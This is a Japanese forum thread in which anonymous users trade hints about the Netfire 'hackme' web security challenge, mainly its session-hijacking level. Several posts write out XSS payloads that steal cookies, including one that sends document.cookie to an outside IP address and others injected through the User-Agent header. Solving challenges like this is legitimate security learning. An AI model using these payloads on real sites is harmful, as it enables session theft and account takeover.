743 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:43:17.33
744 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:44:30.89
はあ また具体的なネタバレかよ
直接書かないだけマシだけどわざわざ名前書くとことか最高にダサい
直接書かないだけマシだけどわざわざ名前書くとことか最高にダサい
745 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:44:55.03
>>742
分かるwww 多分、もう少しだぞ。がんばれ。
分かるwww 多分、もう少しだぞ。がんばれ。
746 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:47:45.63
>>744
どうせ本持ってなきゃ無理だし本には答えの1/3くらいしか実際には書いてない
どうせ本持ってなきゃ無理だし本には答えの1/3くらいしか実際には書いてない
えぇぇぇww
748 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:49:52.52
解けた…嘘だろ…
749 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:51:00.89
なんで完全一致しかダメなんだよ…嘘だろ…
750 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:51:20.75
おめww
感想を書いてくれ。
それが俺達のヒントになる。
感想を書いてくれ。
それが俺達のヒントになる。
751 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:51:44.79
完全一致だと・・・何そのクソゲー
752 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:52:22.37
お前は次に「>>602が全てだった」という
753 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:52:26.85
Hackmeはゲームとしては面白いけど,公式アカウントとか何考えてるんだろう
どう考えても今のままじゃビジネスモデルとして成立しないと思うんだけど
ユーザが増えなきゃ宣伝にはならないし,ユーザが増えたらネタバレだって増えるんだし
どう考えても今のままじゃビジネスモデルとして成立しないと思うんだけど
ユーザが増えなきゃ宣伝にはならないし,ユーザが増えたらネタバレだって増えるんだし
754 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:52:47.62
>>748
同時かww
同時かww
755 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:53:22.03
え、完全一致じゃないとだめなの?
ためしてくる!
ためしてくる!
756 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:54:11.55
>>755
完全一致と聞いて逆にヤル気が起きてるお前を尊敬する。
完全一致と聞いて逆にヤル気が起きてるお前を尊敬する。
757 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:55:24.79
完全一致…
まじかよ…
locationぶっ飛ばし系でいいのか?
つかjqueryじゃないだろうな
てかajaxで飛ばしてるんだからニョロンってなれよ…
まじかよ…
locationぶっ飛ばし系でいいのか?
つかjqueryじゃないだろうな
てかajaxで飛ばしてるんだからニョロンってなれよ…
758 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:55:51.27
俺の2日間嘘だろ…
759 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:57:48.19
760 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:57:50.70
* *
* うそです +
n ∧_∧ n
+ (ヨ(* ´∀`)E)
Y Y *
* うそです +
n ∧_∧ n
+ (ヨ(* ´∀`)E)
Y Y *
761 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:58:34.15
>>747
だから言っただろwwww
だから言っただろwwww
762 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:58:49.80
location
src
href
これらのうちどれかを使うのかだけ教えてくれ
src
href
これらのうちどれかを使うのかだけ教えてくれ
763 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:59:18.96
>>762
このスレをみればわかる!
このスレをみればわかる!
764 :名無しさん@お腹いっぱい。:2011/02/25(金) 02:59:39.48
>>602が全てだった、…っは!?
765 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:00:25.03
挙動が同じであっても特定のワードが揃わないとリジェクトされるみたい。
嘘だろ…
嘘だろ…
766 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:01:29.37
eeeeee
767 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:02:06.81
まじでかw
768 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:02:20.26
>>762
その問いに対する答えは既に出ている。
その問いに対する答えは既に出ている。
769 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:03:34.37
770 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:03:48.01
うわこれはひどいwww
確かに>>602がすべてだったwww
確かに>>602がすべてだったwww
771 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:04:14.22
常識を問われているわけですねわかります
772 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:04:23.29
うげぇ
ふざけんな…
ブラウザ依存考慮してのアレなんだろうが、別にアレでもいいだろうが…
cookieからnameを拾って内部でそのまま表示させてると仮定
別鯖経由させないならこの手法でロギング出来るので…
document.cookie='name='+document.cookie;location.reload();
とか色々やってた俺は何なんだよ!
まじうぜぇwwwwwwwwwwww
他にもeval,xhr,iframe,ajaxやら何やら色々ためしたぞ、糞がwwwwwwww
ふざけんな…
ブラウザ依存考慮してのアレなんだろうが、別にアレでもいいだろうが…
cookieからnameを拾って内部でそのまま表示させてると仮定
別鯖経由させないならこの手法でロギング出来るので…
document.cookie='name='+document.cookie;location.reload();
とか色々やってた俺は何なんだよ!
まじうぜぇwwwwwwwwwwww
他にもeval,xhr,iframe,ajaxやら何やら色々ためしたぞ、糞がwwwwwwww
773 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:04:56.68
答えとかヒント聞く奴は結局ヒントだけでここまできて,何も理解してないだろ
少なくともLV4まではちゃんと調べればなんとかなるぞ
問題は正解でもいいんじゃないかってのが通らない場合があるってことだけ
少なくともLV4まではちゃんと調べればなんとかなるぞ
問題は正解でもいいんじゃないかってのが通らない場合があるってことだけ
774 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:05:58.96
775 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:06:40.10
776 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:06:55.29
javascript:document.location="http://66.249.89.99/cookie.php?c="+document.cookie
777 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:07:19.10
もうむりwww
778 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:08:03.46
>>772
あんた、、相当色々な事をやってたんだな。
あんた、、相当色々な事をやってたんだな。
779 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:08:22.94
780 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:09:20.93
ログインに飛ばすとか
飛んだらばれるから非同期で送るとか散々やったのにこの仕打ち
飛んだらばれるから非同期で送るとか散々やったのにこの仕打ち
781 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:10:04.54
Lv4そんなに酷いかな? 上のほうにも出てたけど、教科書的じゃない?
782 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:11:22.10
そろそろLv4の話も出尽くしたし、次いこうぜ…
783 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:11:36.74
なぜ>>776でいけないのか教えてください。
784 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:12:05.04
あれですか?この程度のものじゃ破れないだろう?って先入観で、
もっと小難しいことやると通らないって事ですか?
もっと小難しいことやると通らないって事ですか?
785 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:12:40.73
Lv4 40文字でいけたよ
786 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:13:14.36
とりあえずコード張り付けるのはやめようよ
Lv5手がかり全然無いよな・・・
Lv5手がかり全然無いよな・・・
787 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:13:55.64
>>779
ちょい前のへっぽこサービスだとログイン後に名前をcookieに保持させる事があるだろう
毎回dbに問い合わせてusername取ってくるちょいアレなシステムの負荷低減のためにさ
それを想定したのよ
まぁしかしこりゃまたほんとに基本だったわwww
んじゃlv5を覗いてみるか…
ちょい前のへっぽこサービスだとログイン後に名前をcookieに保持させる事があるだろう
毎回dbに問い合わせてusername取ってくるちょいアレなシステムの負荷低減のためにさ
それを想定したのよ
まぁしかしこりゃまたほんとに基本だったわwww
んじゃlv5を覗いてみるか…
788 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:14:57.32
789 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:15:00.61
Lv5の答えはあなたのGoogleアカウントです
790 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:16:06.03
Lv5が完璧に見えるんだが、なんかヒントないのか。
>>774
本来正解となりえないものが正解になるわけだが、そこもやっぱりクソな点だよな
本来正解となりえないものが正解になるわけだが、そこもやっぱりクソな点だよな
792 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:17:11.07
あー、でもLv4の問題が理不尽だったおかげで色んな回り道は覚えたな・・
793 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:19:53.12
Lv4のにょきっ!にビビったwww
794 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:19:56.29
hackme まとめ。
Lv1:ある程度ネットに親しんでいる人なら誰でもクリア可能。
Lv2:SQLインジェクション
Lv3:ディレクトリトラバーサル
Lv4:セッションハイジャック(XSSで盗聴)
Lv5:不明
Lv1:ある程度ネットに親しんでいる人なら誰でもクリア可能。
Lv2:SQLインジェクション
Lv3:ディレクトリトラバーサル
Lv4:セッションハイジャック(XSSで盗聴)
Lv5:不明
795 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:20:08.91
hackmeは注目が増えて評判は下がる一方だなw
796 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:21:06.49
ネットファイアすげーって全く思えないのがすげー
797 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:21:09.23
>>793
にょきっ!は笑うよなw
にょきっ!は笑うよなw
798 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:21:55.61
まとめ。(キリッ
お前馬鹿だろ
お前馬鹿だろ
799 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:22:26.30
Lv5って、一応ほんとのIDパスは用意してるけど、こういう構成にしてると破られないでしょ?
いろいろな情報を表示するのもいいけれど、気をつけないと危険な目にあいますよ、といいたいのかなぁ
いろいろな情報を表示するのもいいけれど、気をつけないと危険な目にあいますよ、といいたいのかなぁ
800 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:25:10.25
ランキングのhtml出力見たけど、
改行タグの位置がLv5(h1閉じ直後)とLv4(IDリストの次の行)で違うね。
ひょっとしたらLv5の位置には最初からIDリストの出力が想定されてないんじゃないかって気が
改行タグの位置がLv5(h1閉じ直後)とLv4(IDリストの次の行)で違うね。
ひょっとしたらLv5の位置には最初からIDリストの出力が想定されてないんじゃないかって気が
801 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:25:22.66
問題としてる以上何らかの脆弱性がないとフェアじゃないんじゃないか
さすがにそれやったら評判うんこだろ
当たり抜きのくじみたいなもん
さすがにそれやったら評判うんこだろ
当たり抜きのくじみたいなもん
802 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:27:36.05
だが中の人も解いてないんだぜやおいちゃん
803 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:27:39.26
>>799
それなら総当りおkになるよな
それなら総当りおkになるよな
804 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:27:43.51
この手のサイトつくっておいて
「100万PV達成しました!ありがとうございます!」
だぜ?
PVがいかに指標として役に立たないかについても言及するつもりがあるならいいけど、ねぇw
「100万PV達成しました!ありがとうございます!」
だぜ?
PVがいかに指標として役に立たないかについても言及するつもりがあるならいいけど、ねぇw
805 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:28:52.54
<script>document.location="http://hackme.netfire.jp/Lv4/login ;sessionid="+document.cookie.match(sessionid=[^;]+/)</script>
とかじゃないの?
とかじゃないの?
806 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:30:08.35
これでLv5の問題がガチな脆弱性発見してくださいとかなら公式のページ破壊するしかないな
807 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:30:13.95
試して変化があれば正解、そうじゃなければ不正解。
なんでそんなのも判断できないの?
なんでそんなのも判断できないの?
808 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:31:29.76
lv5は高木さん降臨しないと無理っぽい
というか以外と国内のセキュリティに詳しい人ってそれ程でも無いんだなぁとこのテストからわかった
というか以外と国内のセキュリティに詳しい人ってそれ程でも無いんだなぁとこのテストからわかった
809 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:31:40.42
>>796
なんか・・・、やっつけ感がね。
なんか・・・、やっつけ感がね。
810 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:32:48.09
はまちちゃんまだか
811 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:33:17.09
>>802
確かにな。中の人がLv5クリアしてないってのは大きなヒントかもな。
確かにな。中の人がLv5クリアしてないってのは大きなヒントかもな。
812 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:33:25.01
>>807
アドバイスがほしいから。
アドバイスがほしいから。
813 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:33:33.43
>>808
シビアすぎなだけです
シビアすぎなだけです
814 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:33:43.09
815 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:33:47.74
にょき!を入手したのはいいがこれ本物と違わね?なにごとや
816 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:35:19.68
つか、ここにコード書くんじゃねぇーよ
817 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:35:51.34
コード書くなとかネタバレすんなって言ってる奴は社員か?
818 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:36:28.32
はまちちゃんにLv5やって欲しいわー
819 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:38:31.76
820 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:41:19.05
社員じゃないけどコード書いてネタばれはないわ
そしてすまん
ここに載ってる不正解コードはIE6じゃ動かないんだな
そしてすまん
ここに載ってる不正解コードはIE6じゃ動かないんだな
821 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:42:18.62
Lv5はこれなんなの?
難しすぎる
難しすぎる
822 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:45:30.80
Lv5はソーシャル・エンジニアリング
netfire社のゴミ袋に正解が書いてある
netfire社のゴミ袋に正解が書いてある
823 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:46:39.52
>>820
何でみんなそう書いてんだろう、と不思議に思ってたんだけど、いつのころからかそう書けるようになってたんだね。。。しらなかった。
何でみんなそう書いてんだろう、と不思議に思ってたんだけど、いつのころからかそう書けるようになってたんだね。。。しらなかった。
824 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:47:59.95
lv5は管理者権限奪取
825 :名無しさん@お腹いっぱい。:2011/02/25(金) 03:58:59.71
foobar限定で狙ってるわけではないのでIE6にそこまで拘る必要もない
っていうのもある。
っていうのもある。
826 :名無しさん@お腹いっぱい。:2011/02/25(金) 04:03:09.30
lv5、エラー出たかも…
でも、、これ再現の仕方がよくわからん…
でも、、これ再現の仕方がよくわからん…
827 :名無しさん@お腹いっぱい。:2011/02/25(金) 04:06:03.50
TwitterでLv2の答え書いてるアホが多いな
828 :名無しさん@お腹いっぱい。:2011/02/25(金) 04:08:19.25
Lv4やっとクリアした…
つーか、user agent switcher って UA の変更したあとにツールからまた選択しなおさないといけないのな…
こんなくだらないことで数時間無駄にしたわ
つーか、user agent switcher って UA の変更したあとにツールからまた選択しなおさないといけないのな…
こんなくだらないことで数時間無駄にしたわ
829 :名無しさん@お腹いっぱい。:2011/02/25(金) 04:10:07.16
>>828
付属テストもしないなんて。。。
付属テストもしないなんて。。。
830 :名無しさん@お腹いっぱい。:2011/02/25(金) 04:13:55.16
Lv4突破。にょき!に気づかず恐らく何回か遠回りしていた
831 :名無しさん@お腹いっぱい。:2011/02/25(金) 04:19:24.88
にょきったものをどう使うの?
832 :名無しさん@お腹いっぱい。:2011/02/25(金) 04:19:43.77
さすがにこれは辛いな。
833 :名無しさん@お腹いっぱい。:2011/02/25(金) 04:21:34.29
Lv4ってfoobarがログインまだしてますよってのを利用するのかな。
話聞いてるとクッキー内のsessionidで判別してるっぽいけどfoobarのsessionidなんてわからないよね。
そこをどうにかするのがみそなのかな
話聞いてるとクッキー内のsessionidで判別してるっぽいけどfoobarのsessionidなんてわからないよね。
そこをどうにかするのがみそなのかな
834 :名無しさん@お腹いっぱい。:2011/02/25(金) 04:26:16.29
Lv5のエラーメッセージ見えた。赤字で出る。
835 :名無しさん@お腹いっぱい。:2011/02/25(金) 04:30:09.23
にょきって具体的にどんな表示?
836 :名無しさん@お腹いっぱい。:2011/02/25(金) 04:32:30.79
まぁ見ればすぐわかるようににょき!
でもそれをどうするかがわからない sessionidとは違うみたいだ
でもそれをどうするかがわからない sessionidとは違うみたいだ
837 :名無しさん@お腹いっぱい。:2011/02/25(金) 04:49:31.24
>>835
JavaScriptをONにした状態でログイン後の表示を3秒見る
変化がなければ失敗
視力0.5でも見落とさないくらいでかい
>>831
そこはまったく理不尽さがない
ぐぐれとしか
>>833
スレが落ちる前にもう一度読み直すべき
どういう技術を使うかはわかる
解らなかったら一から勉強しなおすレベル
JavaScriptをONにした状態でログイン後の表示を3秒見る
変化がなければ失敗
視力0.5でも見落とさないくらいでかい
>>831
そこはまったく理不尽さがない
ぐぐれとしか
>>833
スレが落ちる前にもう一度読み直すべき
どういう技術を使うかはわかる
解らなかったら一から勉強しなおすレベル
838 :名無しさん@お腹いっぱい。:2011/02/25(金) 04:52:40.49
Lv5、まったくわからん。「The input field '' was not expected.」とか「文字を与えてください」でどうこうではないんだろうなあ・・
839 :名無しさん@お腹いっぱい。:2011/02/25(金) 04:54:06.50
>>828
これがすべてだった。まじ死にたい。
これがすべてだった。まじ死にたい。
840 :名無しさん@お腹いっぱい。:2011/02/25(金) 04:56:14.45
前から思ってたんだが、英数字と下線のみなのにどうして-は蹴られないんだ?
全てのLvでいえるんだが。
全てのLvでいえるんだが。
841 :名無しさん@お腹いっぱい。:2011/02/25(金) 05:00:24.91
フィールド名もサニタイズされてるっぽくてむりぽ
842 :名無しさん@お腹いっぱい。:2011/02/25(金) 05:02:21.47
843 :名無しさん@お腹いっぱい。:2011/02/25(金) 05:13:12.41
スクリプトが実行可能なようですってちょっと意味が分からないんだけど
844 :名無しさん@お腹いっぱい。:2011/02/25(金) 05:52:09.08
>>838
それどうやって出した?
それどうやって出した?
845 :名無しさん@お腹いっぱい。:2011/02/25(金) 06:02:14.51
>>844
firebugとかで、htmlをこんな感じにしてpostした
別のLvでも再現できるから、これではなさそう
「The input field '' was not expected.」
<td><input type="password" name="password" value=""/></td>
↓
<td><input type="password" name="password" value=""/></td>
<td><input type="password" name="password2" value=""/></td>
「文字を与えてください」
<td><input type="password" name="password" value=""/></td>
↓
<td><input type="password" name="password" value=""/></td>
<td><input type="password" name="password" value=""/></td>
firebugとかで、htmlをこんな感じにしてpostした
別のLvでも再現できるから、これではなさそう
「The input field '' was not expected.」
<td><input type="password" name="password" value=""/></td>
↓
<td><input type="password" name="password" value=""/></td>
<td><input type="password" name="password2" value=""/></td>
「文字を与えてください」
<td><input type="password" name="password" value=""/></td>
↓
<td><input type="password" name="password" value=""/></td>
<td><input type="password" name="password" value=""/></td>
846 :名無しさん@お腹いっぱい。:2011/02/25(金) 06:05:34.73
フィールド自体消去するとMissingValueとか出るけど、
内部の情報見たり他人のデータ掠め取るのには到底使えない。ふむ
内部の情報見たり他人のデータ掠め取るのには到底使えない。ふむ
847 :名無しさん@お腹いっぱい。:2011/02/25(金) 06:06:08.66
>>721
それじゃログインできなかった人しかこないよ
それじゃログインできなかった人しかこないよ
848 :名無しさん@お腹いっぱい。:2011/02/25(金) 06:29:03.80
>>847
じゃあどうすりゃいいのよ
じゃあどうすりゃいいのよ
849 :名無しさん@お腹いっぱい。:2011/02/25(金) 06:34:08.15
わからん
850 :名無しさん@お腹いっぱい。:2011/02/25(金) 06:34:40.79
クイズの答えを人に聞くんじゃねぇ
851 :名無しさん@お腹いっぱい。:2011/02/25(金) 06:41:46.45
Lv4は他鯖必要ないってんだからdocument.location使う意味ないよね。
コレって別のアドに飛ばすもんでしょ?
とするとどうすりゃいいのさ・・・
コレって別のアドに飛ばすもんでしょ?
とするとどうすりゃいいのさ・・・
852 :名無しさん@お腹いっぱい。:2011/02/25(金) 06:42:17.14
いるけどいらない
853 :名無しさん@お腹いっぱい。:2011/02/25(金) 07:11:39.75
ニョキってなんだよー!
どうやって出すんだよー!
どうやって出すんだよー!
854 :名無しさん@お腹いっぱい。:2011/02/25(金) 07:21:28.62
ニョキはもう答えだから、出し方教えたらい見ないでしょ
855 :名無しさん@お腹いっぱい。:2011/02/25(金) 07:31:45.65
726の言ってるなりすましってのはやっぱりfoobarのsessionidとかってはなしなのか?
856 :名無しさん@お腹いっぱい。:2011/02/25(金) 07:40:40.03
>>855
やってみたら分かる
やってみたら分かる
857 :名無しさん@お腹いっぱい。:2011/02/25(金) 07:49:56.02
なんか色々いじいじしてたら
Missing value
っつてエラーが出た
普通は英数と数字と〜とか入力してくださいってエラーだからちょっと前進なのかしら
Missing value
っつてエラーが出た
普通は英数と数字と〜とか入力してくださいってエラーだからちょっと前進なのかしら
858 :名無しさん@お腹いっぱい。:2011/02/25(金) 08:01:51.95
自サバを使うようなスクリプトが正解だけど自サバを実際に立てる必要は無いって事?
859 :名無しさん@お腹いっぱい。:2011/02/25(金) 08:04:57.67
Lv4が一番するっと通った気がするのだけどそんなにややこしかったかな
860 :名無しさん@お腹いっぱい。:2011/02/25(金) 08:06:36.48
>>857
俺もそれ思ったけど、Lv1から出るエラーだからあってるのか迷ってる。
俺もそれ思ったけど、Lv1から出るエラーだからあってるのか迷ってる。
861 :名無しさん@お腹いっぱい。:2011/02/25(金) 08:14:05.39
lv4のニョキの送信方法のヒントくれ
自分が使ってるので書き換えてアクセスしても通らない
自分が使ってるので書き換えてアクセスしても通らない
862 :名無しさん@お腹いっぱい。:2011/02/25(金) 08:17:38.43
863 :名無しさん@お腹いっぱい。:2011/02/25(金) 08:19:24.13
実際に立てる必要無いってコトはnetfireの方にクッキー盗聴するスクリプトがあるのかね。
ユーザーエージェントにlocation云々書いてfooさんアクセスを待つ。
んでアクセスしたんだろうなーってところで盗聴スクリプトからfooのsessionidをコピる
sessionidコピったら自分のidを書き換えてpost出来るソフト化なんか使ってアクセス
(゚д゚)ウマー
・・・って事なのかな
たしかにコレなら必要だけど必要じゃないってのもハマってると思うんだけどな。
ユーザーエージェントにlocation云々書いてfooさんアクセスを待つ。
んでアクセスしたんだろうなーってところで盗聴スクリプトからfooのsessionidをコピる
sessionidコピったら自分のidを書き換えてpost出来るソフト化なんか使ってアクセス
(゚д゚)ウマー
・・・って事なのかな
たしかにコレなら必要だけど必要じゃないってのもハマってると思うんだけどな。
864 :名無しさん@お腹いっぱい。:2011/02/25(金) 08:21:44.41
>>863
大体あってる
大体あってる
865 :名無しさん@お腹いっぱい。:2011/02/25(金) 08:22:19.20
866 :名無しさん@お腹いっぱい。:2011/02/25(金) 08:24:41.74
だからなんでネタバレするん?それもうヒントじゃねーじゃん。
アホなの?自己中なの?
アホなの?自己中なの?
867 :名無しさん@お腹いっぱい。:2011/02/25(金) 08:32:34.37
javascript知らないしヒントの域にすら入ってないから心配すんあw
868 :名無しさん@お腹いっぱい。:2011/02/25(金) 08:35:38.79
UAを
<script>document.location="http://hackme.netfire.jp/?cookie="+document.cookie</script>
にしてIDとパス適当に打ってログインしても普通に失敗してなんの動きも見せないんだよね。
http://hackme.netfire.jp/?cookie=
にアクセスしても意味ないしw
<script>document.location="http://hackme.netfire.jp/?cookie="+document.cookie</script>
にしてIDとパス適当に打ってログインしても普通に失敗してなんの動きも見せないんだよね。
http://hackme.netfire.jp/?cookie=
にアクセスしても意味ないしw
869 :名無しさん@お腹いっぱい。:2011/02/25(金) 08:43:27.59
Lv4はほぼ答えが出てるから、これ以上ここで考察しても意味ない
あとは自分で考えろ
あとは自分で考えろ
870 :名無しさん@お腹いっぱい。:2011/02/25(金) 08:53:33.53
まあ確かにlv4はちょっとイラッとくるのはわかる。
何時間無駄にしたんだよって感じ。
何時間無駄にしたんだよって感じ。
871 :名無しさん@お腹いっぱい。:2011/02/25(金) 09:02:09.05
Lv4、こんだけ試したのにニョキってのやらがでないなら
俺はもう製作者の意図(笑)を理解することは一生できんわ、諦めよう
俺はもう製作者の意図(笑)を理解することは一生できんわ、諦めよう
872 :名無しさん@お腹いっぱい。:2011/02/25(金) 09:32:55.60
> @Netfire_Inc: Lv4の合格判定を修正しました。
少し緩くなったっぽいな。今まで失敗してた人も多分これで通ると思う
少し緩くなったっぽいな。今まで失敗してた人も多分これで通ると思う
873 :名無しさん@お腹いっぱい。:2011/02/25(金) 09:40:54.83
ブラウザ使わずにずっとPHPからリクエスト投げてたせいでニョキを見落としてたわ…
874 :名無しさん@お腹いっぱい。:2011/02/25(金) 09:44:05.21
(Lv4) 称号:ハッカー の方々
総勢100人
ランキング省略されたな。おつかれ
総勢100人
ランキング省略されたな。おつかれ
875 :名無しさん@お腹いっぱい。:2011/02/25(金) 10:05:09.65
Lv5がさっぱりわからねーよ。
876 :名無しさん@お腹いっぱい。:2011/02/25(金) 10:05:49.66
877 :名無しさん@お腹いっぱい。:2011/02/25(金) 10:07:20.16
ニョキってまさかポップアップ?
ポップアップブロックしてたら永遠にミリなの??
違うならいいけど。
ポップアップブロックしてたら永遠にミリなの??
違うならいいけど。
878 :名無しさん@お腹いっぱい。:2011/02/25(金) 10:09:36.30
>>877
jqueryだから気にすんな
jqueryだから気にすんな
879 :名無しさん@お腹いっぱい。:2011/02/25(金) 10:16:27.43
>>876
ログイン履歴の少し下のあたりを見とくといいよ
ログイン履歴の少し下のあたりを見とくといいよ
880 :名無しさん@お腹いっぱい。:2011/02/25(金) 10:55:37.85
寝ておきて同じスクリプト試したら2秒でできた・・・
なんということだ
なんということだ
881 :名無しさん@お腹いっぱい。:2011/02/25(金) 11:00:12.04
882 :名無しさん@お腹いっぱい。:2011/02/25(金) 11:06:31.85
総当たりさせろよ〜w
あっという間にBANされて笑うわ
あっという間にBANされて笑うわ
883 :名無しさん@お腹いっぱい。:2011/02/25(金) 11:07:38.47
ぶっちゃけLv2〜Lv4って手法が違うだけで難易度似たようなもんだよね
884 :名無しさん@お腹いっぱい。:2011/02/25(金) 11:10:05.96
885 :名無しさん@お腹いっぱい。:2011/02/25(金) 11:11:26.01
Lv2 パターンは少ないが製作者の意図を汲まないと無理
Lv3 一般的
Lv4 パターンも多く製作者の意図を汲まないと無理→ちょいゆるめになった
結構違う
Lv3 一般的
Lv4 パターンも多く製作者の意図を汲まないと無理→ちょいゆるめになった
結構違う
886 :名無しさん@お腹いっぱい。:2011/02/25(金) 11:14:20.15
887 :名無しさん@お腹いっぱい。:2011/02/25(金) 11:17:31.34
Lv5ってさ、
「脆弱性なんか作ってないけどアカウントは作ってあるから各々頑張って突破してみ?」ってことなんじゃね?
「脆弱性なんか作ってないけどアカウントは作ってあるから各々頑張って突破してみ?」ってことなんじゃね?
888 :名無しさん@お腹いっぱい。:2011/02/25(金) 11:27:10.78
Lv5わかんねーよ! 一応HTTPヘッダも見たけど怪しいところなし。
--> HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Pragma: no-cache
Cache-Control: no-cache
Content-Encoding: gzip
Date: Fri, 25 Feb 2011 02:23:29 GMT
Server: Google Frontend
Content-Length: 1933
--> HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Pragma: no-cache
Cache-Control: no-cache
Content-Encoding: gzip
Date: Fri, 25 Feb 2011 02:23:29 GMT
Server: Google Frontend
Content-Length: 1933
889 :名無しさん@お腹いっぱい。:2011/02/25(金) 11:27:28.53
Lv4
にょきの情報をどう使えばいいのかわからん
ヘッダに書くんじゃないの?
にょきの情報をどう使えばいいのかわからん
ヘッダに書くんじゃないの?
890 :名無しさん@お腹いっぱい。:2011/02/25(金) 11:28:32.54
891 :名無しさん@お腹いっぱい。:2011/02/25(金) 11:28:38.23
892 :名無しさん@お腹いっぱい。:2011/02/25(金) 11:30:04.98
LV4そろそろネタバレしてもいいかな?
893 :名無しさん@お腹いっぱい。:2011/02/25(金) 11:34:17.23
もういいんじゃねw
宣伝は終わったww
結局lv5で自分とこの製品チェックしたいんだよ。
宣伝は終わったww
結局lv5で自分とこの製品チェックしたいんだよ。
894 :名無しさん@お腹いっぱい。:2011/02/25(金) 11:34:54.02
>>891
ヒントってどんなやつ??
ヒントってどんなやつ??
895 :名無しさん@お腹いっぱい。:2011/02/25(金) 11:36:16.94
lv3の時は「バカが」とおもったけど
lv4の時は言うやつ居ないんじゃ・・・ないだろうかw
lv4の時は言うやつ居ないんじゃ・・・ないだろうかw
896 :名無しさん@お腹いっぱい。:2011/02/25(金) 11:37:52.52
>>894
Lv5のURLって「/Lv5/login」じゃん?
Lv5のだけ何故か末尾に/をつけても404にならないんだよね。
Lv4以下で試したら全部404になった。
これってURLを弄れってことなんじゃないかな?って思ってさ。
Lv5のURLって「/Lv5/login」じゃん?
Lv5のだけ何故か末尾に/をつけても404にならないんだよね。
Lv4以下で試したら全部404になった。
これってURLを弄れってことなんじゃないかな?って思ってさ。
897 :名無しさん@お腹いっぱい。:2011/02/25(金) 11:38:51.45
Lv4、最初のコードの判定はちょっと酷かったかもしれないけど
にょきが出た後はヒントいらないだろ
それが解らないならそこまで来れたのがおかしい
にょきが出た後はヒントいらないだろ
それが解らないならそこまで来れたのがおかしい
898 :名無しさん@お腹いっぱい。:2011/02/25(金) 11:40:22.23
自分のをにょきのに書き換えてsendしてもloginに戻されるぞ・・・
どういう事なの
どういう事なの
899 :名無しさん@お腹いっぱい。:2011/02/25(金) 11:40:59.92
>>898
同じことが少し上に出てるぞ。
同じことが少し上に出てるぞ。
900 :名無しさん@お腹いっぱい。:2011/02/25(金) 11:44:31.70
901 :名無しさん@お腹いっぱい。:2011/02/25(金) 11:48:48.29
あー、書き換えじゃなくて追加か。
なるほどと思ったありがとう
